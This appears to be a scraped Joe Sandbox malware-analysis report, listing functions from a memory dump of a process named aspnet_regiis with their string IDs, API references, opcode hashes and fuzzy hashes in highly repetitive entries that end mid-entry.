                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: M/($M/(
                                                                                                                                                                                                                                              • API String ID: 237503144-1710806632
                                                                                                                                                                                                                                              • Opcode ID: c815091995ccebbfecfc69408808d9226691ed60dca797fd7e6029a9a5600c88
                                                                                                                                                                                                                                              • Instruction ID: f07d18af8471004e82434cea0a9dda642aeab4e75e39c694d4329daf03f918b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c815091995ccebbfecfc69408808d9226691ed60dca797fd7e6029a9a5600c88
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE2101716583615BE714CE34988279BB7AAEBC6700F01892CE091AB1C5D679880B8756
                                                                                                                                                                                                                                              Function 00742830 Relevance: 2.9, Strings: 2, Instructions: 411COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: C@$_^]\
                                                                                                                                                                                                                                              • API String ID: 0-1259475386
                                                                                                                                                                                                                                              • Opcode ID: 738c79f3f4074a8177e19ae34024e2fa7886c4d9e5b0715d4aff81b300e60a97
                                                                                                                                                                                                                                              • Instruction ID: 04d05adb67da69bb37096400a296674fef82bdd8eed79efdb8ee73e92e5dc26d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 738c79f3f4074a8177e19ae34024e2fa7886c4d9e5b0715d4aff81b300e60a97
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85B107A1A083109BD7149B25D85273BB3E5EFD1324F59C92CF89697382E33CE952C352
                                                                                                                                                                                                                                              Function 0073B8F6 Relevance: 1.7, Strings: 1, Instructions: 477COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: EWC`
                                                                                                                                                                                                                                              • API String ID: 0-1922773688
                                                                                                                                                                                                                                              • Opcode ID: f5c511ea8a09534d4de9e984c6885a3fc42cc554b9583ec259e638eb34507f08
                                                                                                                                                                                                                                              • Instruction ID: 5fb070d09a2943b40c499df1aae8c60b4d81a138711da9d6faf0bcc854924933
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5c511ea8a09534d4de9e984c6885a3fc42cc554b9583ec259e638eb34507f08
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DD10F70605B018BD3358F28C4A27A3BBF2EF96314F18955CD6D78B692E73AE806C750
                                                                                                                                                                                                                                              Function 0074D17D Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(1A11171A), ref: 0074D2A4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                                              • Opcode ID: 0428fd16424ee732ad794f8fa1e8c7da0034aaf59ab127690dbc79031177cdf8
                                                                                                                                                                                                                                              • Instruction ID: 798a5692dede8daa44dd658ec497aadc611ea292b7245fca1f8cff92fce91ca4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0428fd16424ee732ad794f8fa1e8c7da0034aaf59ab127690dbc79031177cdf8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A41C1706043829BE3258F34C9A1B62BFE1FF57314F28868CE5D64B393D76998068B51
                                                                                                                                                                                                                                              Function 0074B170 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "
                                                                                                                                                                                                                                              • API String ID: 0-123907689
                                                                                                                                                                                                                                              • Opcode ID: d05c80c795993c871168dd86f7d1ea5d1d218413b04f758d20a6faf4e3c25647
                                                                                                                                                                                                                                              • Instruction ID: 26216e6e94636726379b52b4ac799de5c0da5d98933b307c5c93068b610cb39d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d05c80c795993c871168dd86f7d1ea5d1d218413b04f758d20a6faf4e3c25647
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BC139B2A083149FD7258E35C49576BF7E9AF85310F19892DE4A587382E73CEC44C792
                                                                                                                                                                                                                                              Function 0074C0E6 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: N&
                                                                                                                                                                                                                                              • API String ID: 0-3274356042
                                                                                                                                                                                                                                              • Opcode ID: d18ad1941c830434db27258192bea668450b3596f25d5c90a0a9cb1b1ec0e302
                                                                                                                                                                                                                                              • Instruction ID: c82482d203adffd630d15e572696f5f5a119b8147d3b9553e30f69d5f95a0922
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d18ad1941c830434db27258192bea668450b3596f25d5c90a0a9cb1b1ec0e302
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4851E661615B804BD72ACB3A88613B7BBD3ABDB314B5C969DC4D7C7686CB3CE4068710
                                                                                                                                                                                                                                              Function 0074C09E Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: N&
                                                                                                                                                                                                                                              • API String ID: 0-3274356042
                                                                                                                                                                                                                                              • Opcode ID: 36f160253196b3ca1dd148c62a1cfc8461064bda4e4c02762ae8465a823f85d7
                                                                                                                                                                                                                                              • Instruction ID: c05aa221c474b3b78d1e0ac31f48ace0c1bc1f2e9e1cc651d59ef04c192be88f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36f160253196b3ca1dd148c62a1cfc8461064bda4e4c02762ae8465a823f85d7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E510865615B804AD72ACB3A88503B37BD3BF9B310F5C969DC4D7DBA86CB3CA4028711
                                                                                                                                                                                                                                              Function 00761160 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                                                                                                              • Opcode ID: 239369c15a29312b9dfce83f2301206609d554b5471593942d5046e4e6660124
                                                                                                                                                                                                                                              • Instruction ID: 45ad7076508d74bfaaa65fb709346c7e547c37a7f9b50567a7b9dd0f5c053887
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 239369c15a29312b9dfce83f2301206609d554b5471593942d5046e4e6660124
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2441F2B1A043109BD718CF64CC5AB7BBBA1FFD5354F58891CE9865B3A0E3799904CB82
                                                                                                                                                                                                                                              Function 0075C830 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 0$z
                                                                                                                                                                                                                                              • API String ID: 0-542936926
                                                                                                                                                                                                                                              • Opcode ID: a78d8198a38ae6d26257e135c29af1211d533347ca17a1d88347c95eb8633fc0
                                                                                                                                                                                                                                              • Instruction ID: f8d08b195e962f5003653749bfbdb56903d7c8e32f073079483cb4366ae0164f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a78d8198a38ae6d26257e135c29af1211d533347ca17a1d88347c95eb8633fc0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C3105B2A193118FD315DF24C88475BBBD6EB95710F09C92CE884A7242D3B9EC498BD6
                                                                                                                                                                                                                                              Function 007489E9 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: _^]\
                                                                                                                                                                                                                                              • API String ID: 0-3116432788
                                                                                                                                                                                                                                              • Opcode ID: 1d64538999d9c661751f378bdc33754984d48e45b214c5cd88274661352888fe
                                                                                                                                                                                                                                              • Instruction ID: 4efcff26ee4a2d3f3924fcb624d18f9909decc5b86a5454255e14d2f52867a36
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d64538999d9c661751f378bdc33754984d48e45b214c5cd88274661352888fe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6701ADB0A0931187D7488B14D59052FB7A2BBC9310F299A2DD09223755C778A8428BDA
                                                                                                                                                                                                                                              Function 0073D8AC Relevance: .5, Instructions: 505COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: cac223725cf17c1bdee1668e7f75b717033cf7796b666e6da13471e137acbca8
                                                                                                                                                                                                                                              • Instruction ID: c1a5b9fc229285e22750762eb3fbbea8949982773a0610f03df707304ae2aa37
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cac223725cf17c1bdee1668e7f75b717033cf7796b666e6da13471e137acbca8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5E105B1A00219CFDB24CF69C8517BABBB1FF49310F18865DE496AB751E338AD11CB94
                                                                                                                                                                                                                                              Function 0073D8D8 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e7c0f45ab84512ae7fb2d8cb6f8bc9bb240f4fd011a8e24e71803b582f72a183
                                                                                                                                                                                                                                              • Instruction ID: d36c932e918184f4136ec2cc9585e60053786fe3244d923e96057f3bc625975b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7c0f45ab84512ae7fb2d8cb6f8bc9bb240f4fd011a8e24e71803b582f72a183
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E1F7B1A00219CFDB24CF69C8517BAB7B1FF49310F14865DE496AB751E338AD11CB94
                                                                                                                                                                                                                                              Function 0074C850 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 8aec8634b3add8829b48206f9541638c5dbe23d6cf02b7ee2e084923ea57c696
                                                                                                                                                                                                                                              • Instruction ID: e6ff0fefe9d1673f50d398ea4b0777687644c252499ca0c5fa6586ae3f8be307
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8aec8634b3add8829b48206f9541638c5dbe23d6cf02b7ee2e084923ea57c696
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17F090244096838ADB068E298060771FBA5AF63304F1D51DDD4C2AB393DB1ED8568724
                                                                                                                                                                                                                                              Function 0074E0DA Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                              • Instruction ID: eee36faa32a61f0b686e675b0d90898701320b7bc0c9655785a807a2b279def2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0F065104487E28ADB234B3E44606B2EFE0AB67130B281BD5C8F19B2C7C3199496C366
                                                                                                                                                                                                                                              Function 0074D116 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2b1e1c9deb0793a2c01a8aeab25995d87821afe3441101b0a67bf025e9b2dbfc
                                                                                                                                                                                                                                              • Instruction ID: 341b3b2dc1dcce72a1e946e696c6c24ff55fdbe25a7b715f9326c53a00523742
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b1e1c9deb0793a2c01a8aeab25995d87821afe3441101b0a67bf025e9b2dbfc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0701F4716442829BD354CF38CDA0666FBA2FB86364F08CB9CD4568B796C638D842C799
                                                                                                                                                                                                                                              Function 0072C805 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a0e74fcfc4164c81d51b9d1929d0d0013511c5cf656859cb7beabe43b81b1bd4
                                                                                                                                                                                                                                              • Instruction ID: 657243aeefeff506cdd708a57cb5bf561a7d45378e1653ff0f8b6d4aacdc9ea8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0e74fcfc4164c81d51b9d1929d0d0013511c5cf656859cb7beabe43b81b1bd4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4C01235542740EF82045F20DC18479B374BB4B202F00E408D407E3211CB69B5019F6D
                                                                                                                                                                                                                                              Function 0075315D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
